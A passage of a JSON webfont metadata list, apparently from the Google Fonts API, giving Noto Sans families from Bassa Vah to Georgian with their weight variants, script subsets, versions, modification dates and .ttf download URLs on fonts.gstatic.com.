\"http://fonts.gstatic.com/s/notosansbassavah/v17/PN_bRee-r3f7LnqsD5sax12gjZn7mBpL5YwUpA2MBdcFn4PEBs6p34gH-GD7.ttf\",\n        \"700\": \"http://fonts.gstatic.com/s/notosansbassavah/v17/PN_bRee-r3f7LnqsD5sax12gjZn7mBpL5YwUpA2MBdcFn4P9Bs6p34gH-GD7.ttf\"\n      },\n      \"category\": \"sans-serif\",\n      \"kind\": \"webfonts#webfont\"\n    },\n    {\n      \"family\": \"Noto Sans Batak\",\n      \"variants\": [\n        \"regular\"\n      ],\n      \"subsets\": [\n        \"batak\",\n        \"latin\",\n        \"latin-ext\"\n      ],\n      \"version\": \"v16\",\n      \"lastModified\": \"2022-09-22\",\n      \"files\": {\n        \"regular\": \"http://fonts.gstatic.com/s/notosansbatak/v16/gok2H6TwAEdtF9N8-mdTCQvT-Zdgo4_PHuk74A.ttf\"\n      },\n      \"category\": \"sans-serif\",\n      \"kind\": \"webfonts#webfont\"\n    },\n    {\n      \"family\": \"Noto Sans Bengali\",\n      \"variants\": [\n        \"100\",\n        \"200\",\n        \"300\",\n        \"regular\",\n        \"500\",\n        \"600\",\n        \"700\",\n        \"800\",\n        \"900\"\n      ],\n      \"subsets\": [\n        \"bengali\",\n        \"latin\",\n        \"latin-ext\"\n      ],\n      \"version\": \"v20\",\n      \"lastModified\": \"2022-09-22\",\n      \"files\": {\n        \"100\": \"http://fonts.gstatic.com/s/notosansbengali/v20/Cn-SJsCGWQxOjaGwMQ6fIiMywrNJIky6nvd8BjzVMvJx2mcSPVFpVEqE-6KmsolKudCk8izI0lc.ttf\",\n        \"200\": \"http://fonts.gstatic.com/s/notosansbengali/v20/Cn-SJsCGWQxOjaGwMQ6fIiMywrNJIky6nvd8BjzVMvJx2mcSPVFpVEqE-6KmsglLudCk8izI0lc.ttf\",\n        \"300\": \"http://fonts.gstatic.com/s/notosansbengali/v20/Cn-SJsCGWQxOjaGwMQ6fIiMywrNJIky6nvd8BjzVMvJx2mcSPVFpVEqE-6KmstdLudCk8izI0lc.ttf\",\n        \"regular\": \"http://fonts.gstatic.com/s/notosansbengali/v20/Cn-SJsCGWQxOjaGwMQ6fIiMywrNJIky6nvd8BjzVMvJx2mcSPVFpVEqE-6KmsolLudCk8izI0lc.ttf\",\n        \"500\": \"http://fonts.gstatic.com/s/notosansbengali/v20/Cn-SJsCGWQxOjaGwMQ6fIiMywrNJIky6nvd8BjzVMvJx2mcSPVFpVEqE-6KmsrtLudCk8izI0lc.ttf\",\n        \"600\": \"http://fonts.gstatic.com/s/notosansbengali/v20/Cn-SJsCGWQxOjaGwMQ6fIiMywrNJIky6nvd8BjzVMvJx2mcSPVFpVEqE-6KmsldMudCk8izI0lc.ttf\",\n        \"700\": \"http://fonts.gstatic.com/s/notosansbengali/v20/Cn-SJsCGWQxOjaGwMQ6fIiMywrNJIky6nvd8BjzVMvJx2mcSPVFpVEqE-6Kmsm5MudCk8izI0lc.ttf\",\n        \"800\": \"http://fonts.gstatic.com/s/notosansbengali/v20/Cn-SJsCGWQxOjaGwMQ6fIiMywrNJIky6nvd8BjzVMvJx2mcSPVFpVEqE-6KmsglMudCk8izI0lc.ttf\",\n        \"900\": \"http://fonts.gstatic.com/s/notosansbengali/v20/Cn-SJsCGWQxOjaGwMQ6fIiMywrNJIky6nvd8BjzVMvJx2mcSPVFpVEqE-6KmsiBMudCk8izI0lc.ttf\"\n      },\n      \"category\": \"sans-serif\",\n      \"kind\": \"webfonts#webfont\"\n    },\n    {\n      \"family\": \"Noto Sans Bhaiksuki\",\n      \"variants\": [\n        \"regular\"\n      ],\n      \"subsets\": [\n        \"bhaiksuki\"\n      ],\n      \"version\": \"v15\",\n      \"lastModified\": \"2022-05-10\",\n      \"files\": {\n        \"regular\": \"http://fonts.gstatic.com/s/notosansbhaiksuki/v15/UcC63EosKniBH4iELXATsSBWdvUHXxhj8rLUdU4wh9U.ttf\"\n      },\n      \"category\": \"sans-serif\",\n      \"kind\": \"webfonts#webfont\"\n    },\n    {\n      \"family\": \"Noto Sans Brahmi\",\n      \"variants\": [\n        \"regular\"\n      ],\n      \"subsets\": [\n        \"brahmi\"\n      ],\n      \"version\": \"v15\",\n      \"lastModified\": \"2022-05-10\",\n      \"files\": {\n        \"regular\": \"http://fonts.gstatic.com/s/notosansbrahmi/v15/vEFK2-VODB8RrNDvZSUmQQIIByV18tK1W77HtMo.ttf\"\n      },\n      \"category\": \"sans-serif\",\n      \"kind\": \"webfonts#webfont\"\n    },\n    {\n      \"family\": \"Noto Sans Buginese\",\n      \"variants\": [\n        \"regular\"\n      ],\n      \"subsets\": [\n        \"buginese\",\n        \"latin\",\n        \"latin-ext\"\n      ],\n      \"version\": \"v17\",\n      \"lastModified\": \"2022-11-09\",\n      \"files\": {\n        \"regular\": \"http://fonts.gstatic.com/s/notosansbuginese/v17/esDM30ldNv-KYGGJpKGk18phe_7Da6_gtfuEXLmNtw.ttf\"\n      },\n      \"category\": \"sans-serif\",\n      \"kind\": \"webfonts#webfont\"\n    },\n    {\n      \"family\": \"Noto Sans Buhid\",\n      \"variants\": [\n        \"regular\"\n      ],\n      \"subsets\": [\n        \"buhid\",\n        \"latin\",\n        \"latin-ext\"\n      ],\n      \"version\": \"v17\",\n      \"lastModified\": \"2022-09-22\",\n      \"files\": {\n        \"regular\": \"http://fonts.gstatic.com/s/notosansbuhid/v17/Dxxy8jiXMW75w3OmoDXVWJD7YwzAe6tgnaFoGA.ttf\"\n      },\n      \"category\": \"sans-serif\",\n      \"kind\": \"webfonts#webfont\"\n    },\n    {\n      \"family\": \"Noto Sans Canadian Aboriginal\",\n      \"variants\": [\n        \"100\",\n        \"200\",\n        \"300\",\n        \"regular\",\n        \"500\",\n        \"600\",\n        \"700\",\n        \"800\",\n        \"900\"\n      ],\n      \"subsets\": [\n        \"canadian-aboriginal\",\n        \"latin\",\n        \"latin-ext\"\n      ],\n      \"version\": \"v21\",\n      \"lastModified\": \"2022-09-28\",\n      \"files\": {\n        \"100\": \"http://fonts.gstatic.com/s/notosanscanadianaboriginal/v21/4C_TLjTuEqPj-8J01CwaGkiZ9os0iGVkezM1mUT-j_Lmlzda6uH_nnX1bzigWLj_yAsg0q0uhQ.ttf\",\n        \"200\": \"http://fonts.gstatic.com/s/notosanscanadianaboriginal/v21/4C_TLjTuEqPj-8J01CwaGkiZ9os0iGVkezM1mUT-j_Lmlzda6uH_nnX1bzig2Ln_yAsg0q0uhQ.ttf\",\n        \"300\": \"http://fonts.gstatic.com/s/notosanscanadianaboriginal/v21/4C_TLjTuEqPj-8J01CwaGkiZ9os0iGVkezM1mUT-j_Lmlzda6uH_nnX1bzigBrn_yAsg0q0uhQ.ttf\",\n        \"regular\": \"http://fonts.gstatic.com/s/notosanscanadianaboriginal/v21/4C_TLjTuEqPj-8J01CwaGkiZ9os0iGVkezM1mUT-j_Lmlzda6uH_nnX1bzigWLn_yAsg0q0uhQ.ttf\",\n        \"500\": \"http://fonts.gstatic.com/s/notosanscanadianaboriginal/v21/4C_TLjTuEqPj-8J01CwaGkiZ9os0iGVkezM1mUT-j_Lmlzda6uH_nnX1bzigarn_yAsg0q0uhQ.ttf\",\n        \"600\": \"http://fonts.gstatic.com/s/notosanscanadianaboriginal/v21/4C_TLjTuEqPj-8J01CwaGkiZ9os0iGVkezM1mUT-j_Lmlzda6uH_nnX1bzighr7_yAsg0q0uhQ.ttf\",\n        \"700\": \"http://fonts.gstatic.com/s/notosanscanadianaboriginal/v21/4C_TLjTuEqPj-8J01CwaGkiZ9os0iGVkezM1mUT-j_Lmlzda6uH_nnX1bzigv77_yAsg0q0uhQ.ttf\",\n        \"800\": \"http://fonts.gstatic.com/s/notosanscanadianaboriginal/v21/4C_TLjTuEqPj-8J01CwaGkiZ9os0iGVkezM1mUT-j_Lmlzda6uH_nnX1bzig2L7_yAsg0q0uhQ.ttf\",\n        \"900\": \"http://fonts.gstatic.com/s/notosanscanadianaboriginal/v21/4C_TLjTuEqPj-8J01CwaGkiZ9os0iGVkezM1mUT-j_Lmlzda6uH_nnX1bzig8b7_yAsg0q0uhQ.ttf\"\n      },\n      \"category\": \"sans-serif\",\n      \"kind\": \"webfonts#webfont\"\n    },\n    {\n      \"family\": \"Noto Sans Carian\",\n      \"variants\": [\n        \"regular\"\n      ],\n      \"subsets\": [\n        \"carian\"\n      ],\n      \"version\": \"v15\",\n      \"lastModified\": \"2022-05-10\",\n      \"files\": {\n        \"regular\": \"http://fonts.gstatic.com/s/notosanscarian/v15/LDIpaoiONgYwA9Yc6f0gUILeMIOgs7ob9yGLmfI.ttf\"\n      },\n      \"category\": \"sans-serif\",\n      \"kind\": \"webfonts#webfont\"\n    },\n    {\n      \"family\": \"Noto Sans Caucasian Albanian\",\n      \"variants\": [\n        \"regular\"\n      ],\n      \"subsets\": [\n        \"caucasian-albanian\"\n      ],\n      \"version\": \"v16\",\n      \"lastModified\": \"2022-05-10\",\n      \"files\": {\n        \"regular\": \"http://fonts.gstatic.com/s/notosanscaucasianalbanian/v16/nKKA-HM_FYFRJvXzVXaANsU0VzsAc46QGOkWytlTs-TXrYDmoVmRSZo.ttf\"\n      },\n      \"category\": \"sans-serif\",\n      \"kind\": \"webfonts#webfont\"\n    },\n    {\n      \"family\": \"Noto Sans Chakma\",\n      \"variants\": [\n        \"regular\"\n      ],\n      \"subsets\": [\n        \"chakma\",\n        \"latin\",\n        \"latin-ext\"\n      ],\n      \"version\": \"v17\",\n      \"lastModified\": \"2022-11-09\",\n      \"files\": {\n        \"regular\": \"http://fonts.gstatic.com/s/notosanschakma/v17/Y4GQYbJ8VTEp4t3MKJSMjg5OIzhi4JjTQhYBeYo.ttf\"\n      },\n      \"category\": \"sans-serif\",\n      \"kind\": \"webfonts#webfont\"\n    },\n    {\n      \"family\": \"Noto Sans Cham\",\n      \"variants\": [\n        \"100\",\n        \"200\",\n        \"300\",\n        \"regular\",\n        \"500\",\n        \"600\",\n        \"700\",\n        \"800\",\n        \"900\"\n      ],\n      \"subsets\": [\n        \"cham\",\n        \"latin\",\n        \"latin-ext\"\n      ],\n      \"version\": \"v23\",\n      \"lastModified\": \"2022-09-28\",\n      \"files\": {\n        \"100\": \"http://fonts.gstatic.com/s/notosanscham/v23/pe06MIySN5pO62Z5YkFyQb_bbuRhe6D4yip43qfcER0cv7GykboaLg.ttf\",\n        \"200\": \"http://fonts.gstatic.com/s/notosanscham/v23/pe06MIySN5pO62Z5YkFyQb_bbuRhe6D4yip43qfckRwcv7GykboaLg.ttf\",\n        \"300\": \"http://fonts.gstatic.com/s/notosanscham/v23/pe06MIySN5pO62Z5YkFyQb_bbuRhe6D4yip43qfcTxwcv7GykboaLg.ttf\",\n        \"regular\": \"http://fonts.gstatic.com/s/notosanscham/v23/pe06MIySN5pO62Z5YkFyQb_bbuRhe6D4yip43qfcERwcv7GykboaLg.ttf\",\n        \"500\": \"http://fonts.gstatic.com/s/notosanscham/v23/pe06MIySN5pO62Z5YkFyQb_bbuRhe6D4yip43qfcIxwcv7GykboaLg.ttf\",\n        \"600\": \"http://fonts.gstatic.com/s/notosanscham/v23/pe06MIySN5pO62Z5YkFyQb_bbuRhe6D4yip43qfczxscv7GykboaLg.ttf\",\n        \"700\": \"http://fonts.gstatic.com/s/notosanscham/v23/pe06MIySN5pO62Z5YkFyQb_bbuRhe6D4yip43qfc9hscv7GykboaLg.ttf\",\n        \"800\": \"http://fonts.gstatic.com/s/notosanscham/v23/pe06MIySN5pO62Z5YkFyQb_bbuRhe6D4yip43qfckRscv7GykboaLg.ttf\",\n        \"900\": \"http://fonts.gstatic.com/s/notosanscham/v23/pe06MIySN5pO62Z5YkFyQb_bbuRhe6D4yip43qfcuBscv7GykboaLg.ttf\"\n      },\n      \"category\": \"sans-serif\",\n      \"kind\": \"webfonts#webfont\"\n    },\n    {\n      \"family\": \"Noto Sans Cherokee\",\n      \"variants\": [\n        \"100\",\n        \"200\",\n        \"300\",\n        \"regular\",\n        \"500\",\n        \"600\",\n        \"700\",\n        \"800\",\n        \"900\"\n      ],\n      \"subsets\": [\n        \"cherokee\",\n        \"latin\",\n        \"latin-ext\"\n      ],\n      \"version\": \"v19\",\n      \"lastModified\": \"2022-09-28\",\n      \"files\": {\n        \"100\": \"http://fonts.gstatic.com/s/notosanscherokee/v19/KFOPCm6Yu8uF-29fiz9vQF9YWK6Z8O10cHNA0cSkZCHYWi5ODkm5rAffjl0.ttf\",\n        \"200\": \"http://fonts.gstatic.com/s/notosanscherokee/v19/KFOPCm6Yu8uF-29fiz9vQF9YWK6Z8O10cHNA0cSkZCHYWq5PDkm5rAffjl0.ttf\",\n        \"300\": \"http://fonts.gstatic.com/s/notosanscherokee/v19/KFOPCm6Yu8uF-29fiz9vQF9YWK6Z8O10cHNA0cSkZCHYWnBPDkm5rAffjl0.ttf\",\n        \"regular\": \"http://fonts.gstatic.com/s/notosanscherokee/v19/KFOPCm6Yu8uF-29fiz9vQF9YWK6Z8O10cHNA0cSkZCHYWi5PDkm5rAffjl0.ttf\",\n        \"500\": \"http://fonts.gstatic.com/s/notosanscherokee/v19/KFOPCm6Yu8uF-29fiz9vQF9YWK6Z8O10cHNA0cSkZCHYWhxPDkm5rAffjl0.ttf\",\n        \"600\": \"http://fonts.gstatic.com/s/notosanscherokee/v19/KFOPCm6Yu8uF-29fiz9vQF9YWK6Z8O10cHNA0cSkZCHYWvBIDkm5rAffjl0.ttf\",\n        \"700\": \"http://fonts.gstatic.com/s/notosanscherokee/v19/KFOPCm6Yu8uF-29fiz9vQF9YWK6Z8O10cHNA0cSkZCHYWslIDkm5rAffjl0.ttf\",\n        \"800\": \"http://fonts.gstatic.com/s/notosanscherokee/v19/KFOPCm6Yu8uF-29fiz9vQF9YWK6Z8O10cHNA0cSkZCHYWq5IDkm5rAffjl0.ttf\",\n        \"900\": \"http://fonts.gstatic.com/s/notosanscherokee/v19/KFOPCm6Yu8uF-29fiz9vQF9YWK6Z8O10cHNA0cSkZCHYWodIDkm5rAffjl0.ttf\"\n      },\n      \"category\": \"sans-serif\",\n      \"kind\": \"webfonts#webfont\"\n    },\n    {\n      \"family\": \"Noto Sans Coptic\",\n      \"variants\": [\n        \"regular\"\n      ],\n      \"subsets\": [\n        \"coptic\",\n        \"latin\",\n        \"latin-ext\"\n      ],\n      \"version\": \"v17\",\n      \"lastModified\": \"2022-09-28\",\n      \"files\": {\n        \"regular\": \"http://fonts.gstatic.com/s/notosanscoptic/v17/iJWfBWmUZi_OHPqn4wq6kgqumOEd78u_VG0xR4Y.ttf\"\n      },\n      \"category\": \"sans-serif\",\n      \"kind\": \"webfonts#webfont\"\n    },\n    {\n      \"family\": \"Noto Sans Cuneiform\",\n      \"variants\": [\n        \"regular\"\n      ],\n      \"subsets\": [\n        \"cuneiform\"\n      ],\n      \"version\": \"v15\",\n      \"lastModified\": \"2022-05-10\",\n      \"files\": {\n        \"regular\": \"http://fonts.gstatic.com/s/notosanscuneiform/v15/bMrrmTWK7YY-MF22aHGGd7H8PhJtvBDWgb9JlRQueeQ.ttf\"\n      },\n      \"category\": \"sans-serif\",\n      \"kind\": \"webfonts#webfont\"\n    },\n    {\n      \"family\": \"Noto Sans Cypriot\",\n      \"variants\": [\n        \"regular\"\n      ],\n      \"subsets\": [\n        \"cypriot\"\n      ],\n      \"version\": \"v15\",\n      \"lastModified\": \"2022-05-10\",\n      \"files\": {\n        \"regular\": \"http://fonts.gstatic.com/s/notosanscypriot/v15/8AtzGta9PYqQDjyp79a6f8Cj-3a3cxIsK5MPpahF.ttf\"\n      },\n      \"category\": \"sans-serif\",\n      \"kind\": \"webfonts#webfont\"\n    },\n    {\n      \"family\": \"Noto Sans Deseret\",\n      \"variants\": [\n        \"regular\"\n      ],\n      \"subsets\": [\n        \"deseret\"\n      ],\n      \"version\": \"v15\",\n      \"lastModified\": \"2022-05-10\",\n      \"files\": {\n        \"regular\": \"http://fonts.gstatic.com/s/notosansdeseret/v15/MwQsbgPp1eKH6QsAVuFb9AZM6MMr2Vq9ZnJSZtQG.ttf\"\n      },\n      \"category\": \"sans-serif\",\n      \"kind\": \"webfonts#webfont\"\n    },\n    {\n      \"family\": \"Noto Sans Devanagari\",\n      \"variants\": [\n        \"100\",\n        \"200\",\n        \"300\",\n        \"regular\",\n        \"500\",\n        \"600\",\n        \"700\",\n        \"800\",\n        \"900\"\n      ],\n      \"subsets\": [\n        \"devanagari\",\n        \"latin\",\n        \"latin-ext\"\n      ],\n      \"version\": \"v19\",\n      \"lastModified\": \"2022-09-22\",\n      \"files\": {\n        \"100\": \"http://fonts.gstatic.com/s/notosansdevanagari/v19/TuGoUUFzXI5FBtUq5a8bjKYTZjtRU6Sgv3NaV_SNmI0b8QQCQmHn6B2OHjbL_08AlXQky-AzoFoW4Ow.ttf\",\n        \"200\": \"http://fonts.gstatic.com/s/notosansdevanagari/v19/TuGoUUFzXI5FBtUq5a8bjKYTZjtRU6Sgv3NaV_SNmI0b8QQCQmHn6B2OHjbL_08AlfQly-AzoFoW4Ow.ttf\",\n        \"300\": \"http://fonts.gstatic.com/s/notosansdevanagari/v19/TuGoUUFzXI5FBtUq5a8bjKYTZjtRU6Sgv3NaV_SNmI0b8QQCQmHn6B2OHjbL_08AlSoly-AzoFoW4Ow.ttf\",\n        \"regular\": \"http://fonts.gstatic.com/s/notosansdevanagari/v19/TuGoUUFzXI5FBtUq5a8bjKYTZjtRU6Sgv3NaV_SNmI0b8QQCQmHn6B2OHjbL_08AlXQly-AzoFoW4Ow.ttf\",\n        \"500\": \"http://fonts.gstatic.com/s/notosansdevanagari/v19/TuGoUUFzXI5FBtUq5a8bjKYTZjtRU6Sgv3NaV_SNmI0b8QQCQmHn6B2OHjbL_08AlUYly-AzoFoW4Ow.ttf\",\n        \"600\": \"http://fonts.gstatic.com/s/notosansdevanagari/v19/TuGoUUFzXI5FBtUq5a8bjKYTZjtRU6Sgv3NaV_SNmI0b8QQCQmHn6B2OHjbL_08Alaoiy-AzoFoW4Ow.ttf\",\n        \"700\": \"http://fonts.gstatic.com/s/notosansdevanagari/v19/TuGoUUFzXI5FBtUq5a8bjKYTZjtRU6Sgv3NaV_SNmI0b8QQCQmHn6B2OHjbL_08AlZMiy-AzoFoW4Ow.ttf\",\n        \"800\": \"http://fonts.gstatic.com/s/notosansdevanagari/v19/TuGoUUFzXI5FBtUq5a8bjKYTZjtRU6Sgv3NaV_SNmI0b8QQCQmHn6B2OHjbL_08AlfQiy-AzoFoW4Ow.ttf\",\n        \"900\": \"http://fonts.gstatic.com/s/notosansdevanagari/v19/TuGoUUFzXI5FBtUq5a8bjKYTZjtRU6Sgv3NaV_SNmI0b8QQCQmHn6B2OHjbL_08Ald0iy-AzoFoW4Ow.ttf\"\n      },\n      \"category\": \"sans-serif\",\n      \"kind\": \"webfonts#webfont\"\n    },\n    {\n      \"family\": \"Noto Sans Display\",\n      \"variants\": [\n        \"100\",\n        \"200\",\n        \"300\",\n        \"regular\",\n        \"500\",\n        \"600\",\n        \"700\",\n        \"800\",\n        \"900\",\n        \"100italic\",\n        \"200italic\",\n        \"300italic\",\n        \"italic\",\n        \"500italic\",\n        \"600italic\",\n        \"700italic\",\n        \"800italic\",\n        \"900italic\"\n      ],\n      \"subsets\": [\n        \"cyrillic\",\n        \"cyrillic-ext\",\n        \"greek\",\n        \"greek-ext\",\n        \"latin\",\n        \"latin-ext\",\n        \"vietnamese\"\n      ],\n      \"version\": \"v20\",\n      \"lastModified\": \"2022-09-22\",\n      \"files\": {\n        \"100\": \"http://fonts.gstatic.com/s/notosansdisplay/v20/RLpbK4fy6r6tOBEJg0IAKzqdFZVZxpMkXJMhnB9XjO1o90LuV-PT4Doq_AKp_3cLVTGQ2iHrvWM.ttf\",\n        \"200\": \"http://fonts.gstatic.com/s/notosansdisplay/v20/RLpbK4fy6r6tOBEJg0IAKzqdFZVZxpMkXJMhnB9XjO1o90LuV-PT4Doq_AKp__cKVTGQ2iHrvWM.ttf\",\n        \"300\": \"http://fonts.gstatic.com/s/notosansdisplay/v20/RLpbK4fy6r6tOBEJg0IAKzqdFZVZxpMkXJMhnB9XjO1o90LuV-PT4Doq_AKp_ykKVTGQ2iHrvWM.ttf\",\n        \"regular\": \"http://fonts.gstatic.com/s/notosansdisplay/v20/RLpbK4fy6r6tOBEJg0IAKzqdFZVZxpMkXJMhnB9XjO1o90LuV-PT4Doq_AKp_3cKVTGQ2iHrvWM.ttf\",\n        \"500\": \"http://fonts.gstatic.com/s/notosansdisplay/v20/RLpbK4fy6r6tOBEJg0IAKzqdFZVZxpMkXJMhnB9XjO1o90LuV-PT4Doq_AKp_0UKVTGQ2iHrvWM.ttf\",\n        \"600\": \"http://fonts.gstatic.com/s/notosansdisplay/v20/RLpbK4fy6r6tOBEJg0IAKzqdFZVZxpMkXJMhnB9XjO1o90LuV-PT4Doq_AKp_6kNVTGQ2iHrvWM.ttf\",\n        \"700\": \"http://fonts.gstatic.com/s/notosansdisplay/v20/RLpbK4fy6r6tOBEJg0IAKzqdFZVZxpMkXJMhnB9XjO1o90LuV-PT4Doq_AKp_5ANVTGQ2iHrvWM.ttf\",\n        \"800\": \"http://fonts.gstatic.com/s/notosansdisplay/v20/RLpbK4fy6r6tOBEJg0IAKzqdFZVZxpMkXJMhnB9XjO1o90LuV-PT4Doq_AKp__cNVTGQ2iHrvWM.ttf\",\n        \"900\": \"http://fonts.gstatic.com/s/notosansdisplay/v20/RLpbK4fy6r6tOBEJg0IAKzqdFZVZxpMkXJMhnB9XjO1o90LuV-PT4Doq_AKp_94NVTGQ2iHrvWM.ttf\",\n        \"100italic\": \"http://fonts.gstatic.com/s/notosansdisplay/v20/RLpZK4fy6r6tOBEJg0IAKzqdFZVZxrktbnDB5UzBIup9PwAcHtEsOFNBZqyu6r9JvXOa3gPurWM9uQ.ttf\",\n        \"200italic\": \"http://fonts.gstatic.com/s/notosansdisplay/v20/RLpZK4fy6r6tOBEJg0IAKzqdFZVZxrktbnDB5UzBIup9PwAcHtEsOFNBZqyu6r9JPXKa3gPurWM9uQ.ttf\",\n        \"300italic\": \"http://fonts.gstatic.com/s/notosansdisplay/v20/RLpZK4fy6r6tOBEJg0IAKzqdFZVZxrktbnDB5UzBIup9PwAcHtEsOFNBZqyu6r9J43Ka3gPurWM9uQ.ttf\",\n        \"italic\": \"http://fonts.gstatic.com/s/notosansdisplay/v20/RLpZK4fy6r6tOBEJg0IAKzqdFZVZxrktbnDB5UzBIup9PwAcHtEsOFNBZqyu6r9JvXKa3gPurWM9uQ.ttf\",\n        \"500italic\": \"http://fonts.gstatic.com/s/notosansdisplay/v20/RLpZK4fy6r6tOBEJg0IAKzqdFZVZxrktbnDB5UzBIup9PwAcHtEsOFNBZqyu6r9Jj3Ka3gPurWM9uQ.ttf\",\n        \"600italic\": \"http://fonts.gstatic.com/s/notosansdisplay/v20/RLpZK4fy6r6tOBEJg0IAKzqdFZVZxrktbnDB5UzBIup9PwAcHtEsOFNBZqyu6r9JY3Wa3gPurWM9uQ.ttf\",\n        \"700italic\": \"http://fonts.gstatic.com/s/notosansdisplay/v20/RLpZK4fy6r6tOBEJg0IAKzqdFZVZxrktbnDB5UzBIup9PwAcHtEsOFNBZqyu6r9JWnWa3gPurWM9uQ.ttf\",\n        \"800italic\": \"http://fonts.gstatic.com/s/notosansdisplay/v20/RLpZK4fy6r6tOBEJg0IAKzqdFZVZxrktbnDB5UzBIup9PwAcHtEsOFNBZqyu6r9JPXWa3gPurWM9uQ.ttf\",\n        \"900italic\": \"http://fonts.gstatic.com/s/notosansdisplay/v20/RLpZK4fy6r6tOBEJg0IAKzqdFZVZxrktbnDB5UzBIup9PwAcHtEsOFNBZqyu6r9JFHWa3gPurWM9uQ.ttf\"\n      },\n      \"category\": \"sans-serif\",\n      \"kind\": \"webfonts#webfont\"\n    },\n    {\n      \"family\": \"Noto Sans Duployan\",\n      \"variants\": [\n        \"regular\"\n      ],\n      \"subsets\": [\n        \"duployan\"\n      ],\n      \"version\": \"v16\",\n      \"lastModified\": \"2022-05-10\",\n      \"files\": {\n        \"regular\": \"http://fonts.gstatic.com/s/notosansduployan/v16/gokzH7nwAEdtF9N8-mdTDx_X9JM5wsvrFsIn6WYDvA.ttf\"\n      },\n      \"category\": \"sans-serif\",\n      \"kind\": \"webfonts#webfont\"\n    },\n    {\n      \"family\": \"Noto Sans Egyptian Hieroglyphs\",\n      \"variants\": [\n        \"regular\"\n      ],\n      \"subsets\": [\n        \"egyptian-hieroglyphs\"\n      ],\n      \"version\": \"v26\",\n      \"lastModified\": \"2022-05-10\",\n      \"files\": {\n        \"regular\": \"http://fonts.gstatic.com/s/notosansegyptianhieroglyphs/v26/vEF42-tODB8RrNDvZSUmRhcQHzx1s7y_F9-j3qSzEcbEYindSVK8xRg7iw.ttf\"\n      },\n      \"category\": \"sans-serif\",\n      \"kind\": \"webfonts#webfont\"\n    },\n    {\n      \"family\": \"Noto Sans Elbasan\",\n      \"variants\": [\n        \"regular\"\n      ],\n      \"subsets\": [\n        \"elbasan\"\n      ],\n      \"version\": \"v15\",\n      \"lastModified\": \"2022-05-10\",\n      \"files\": {\n        \"regular\": \"http://fonts.gstatic.com/s/notosanselbasan/v15/-F6rfiZqLzI2JPCgQBnw400qp1trvHdlre4dFcFh.ttf\"\n      },\n      \"category\": \"sans-serif\",\n      \"kind\": \"webfonts#webfont\"\n    },\n    {\n      \"family\": \"Noto Sans Elymaic\",\n      \"variants\": [\n        \"regular\"\n      ],\n      \"subsets\": [\n        \"elymaic\"\n      ],\n      \"version\": \"v15\",\n      \"lastModified\": \"2022-05-10\",\n      \"files\": {\n        \"regular\": \"http://fonts.gstatic.com/s/notosanselymaic/v15/UqyKK9YTJW5liNMhTMqe9vUFP65ZD4AjWOT0zi2V.ttf\"\n      },\n      \"category\": \"sans-serif\",\n      \"kind\": \"webfonts#webfont\"\n    },\n    {\n      \"family\": \"Noto Sans Ethiopic\",\n      \"variants\": [\n        \"100\",\n        \"200\",\n        \"300\",\n        \"regular\",\n        \"500\",\n        \"600\",\n        \"700\",\n        \"800\",\n        \"900\"\n      ],\n      \"subsets\": [\n        \"ethiopic\",\n        \"latin\",\n        \"latin-ext\"\n      ],\n      \"version\": \"v42\",\n      \"lastModified\": \"2022-12-08\",\n      \"files\": {\n        \"100\": \"http://fonts.gstatic.com/s/notosansethiopic/v42/7cHPv50vjIepfJVOZZgcpQ5B9FBTH9KGNfhSTgtoow1KVnIvyBoMSzUMacb-T35OKqDjwmfeaY9u.ttf\",\n        \"200\": \"http://fonts.gstatic.com/s/notosansethiopic/v42/7cHPv50vjIepfJVOZZgcpQ5B9FBTH9KGNfhSTgtoow1KVnIvyBoMSzUMacb-T37OK6DjwmfeaY9u.ttf\",\n        \"300\": \"http://fonts.gstatic.com/s/notosansethiopic/v42/7cHPv50vjIepfJVOZZgcpQ5B9FBTH9KGNfhSTgtoow1KVnIvyBoMSzUMacb-T34QK6DjwmfeaY9u.ttf\",\n        \"regular\": \"http://fonts.gstatic.com/s/notosansethiopic/v42/7cHPv50vjIepfJVOZZgcpQ5B9FBTH9KGNfhSTgtoow1KVnIvyBoMSzUMacb-T35OK6DjwmfeaY9u.ttf\",\n        \"500\": \"http://fonts.gstatic.com/s/notosansethiopic/v42/7cHPv50vjIepfJVOZZgcpQ5B9FBTH9KGNfhSTgtoow1KVnIvyBoMSzUMacb-T358K6DjwmfeaY9u.ttf\",\n        \"600\": \"http://fonts.gstatic.com/s/notosansethiopic/v42/7cHPv50vjIepfJVOZZgcpQ5B9FBTH9KGNfhSTgtoow1KVnIvyBoMSzUMacb-T36QLKDjwmfeaY9u.ttf\",\n        \"700\": \"http://fonts.gstatic.com/s/notosansethiopic/v42/7cHPv50vjIepfJVOZZgcpQ5B9FBTH9KGNfhSTgtoow1KVnIvyBoMSzUMacb-T36pLKDjwmfeaY9u.ttf\",\n        \"800\": \"http://fonts.gstatic.com/s/notosansethiopic/v42/7cHPv50vjIepfJVOZZgcpQ5B9FBTH9KGNfhSTgtoow1KVnIvyBoMSzUMacb-T37OLKDjwmfeaY9u.ttf\",\n        \"900\": \"http://fonts.gstatic.com/s/notosansethiopic/v42/7cHPv50vjIepfJVOZZgcpQ5B9FBTH9KGNfhSTgtoow1KVnIvyBoMSzUMacb-T37nLKDjwmfeaY9u.ttf\"\n      },\n      \"category\": \"sans-serif\",\n      \"kind\": \"webfonts#webfont\"\n    },\n    {\n      \"family\": \"Noto Sans Georgian\",\n      \"variants\": [\n        \"100\",\n        \"200\",\n        \"300\",\n        \"regular\",\n        \"500\",\n        \"600\",\n        \"700\",\n        \"800\",\n        \"900\"\n      ],\n      \"subsets\": [\n        \"georgian\",\n        \"latin\",\n        \"latin-ext\"\n      ],\n      \"version\": \"v36\",\n      \"lastModified\": \"2022-09-22\",\n      \"files\": {\n        \"100\": \"http://fonts.gstatic.com/s/notosansgeorgian/v36/PlIaFke5O6RzLfvNNVSitxkr76PRHBC4Ytyq-Gof7PUs4S7zWn-8YDB09HFNdpvnzVj-f5WK0OQV.ttf\",\n        \"200\": \"http://fonts.gstatic.com/s/notosansgeorgian/v36/PlIaFke5O6RzLfvNNVSitxkr76PRHBC4Ytyq-Gof7PUs4S7zWn-8YDB09HFNdptnzFj-f5WK0OQV.ttf\",\n        \"300\": \"http://fonts.gstatic.com/s/notosansgeorgian/v36/PlIaFke5O6RzLfvNNVSitxkr76PRHBC4Ytyq-Gof7PUs4S7zWn-8YDB09HFNdpu5zFj-f5WK0OQV.ttf\",\n        \"regular\": 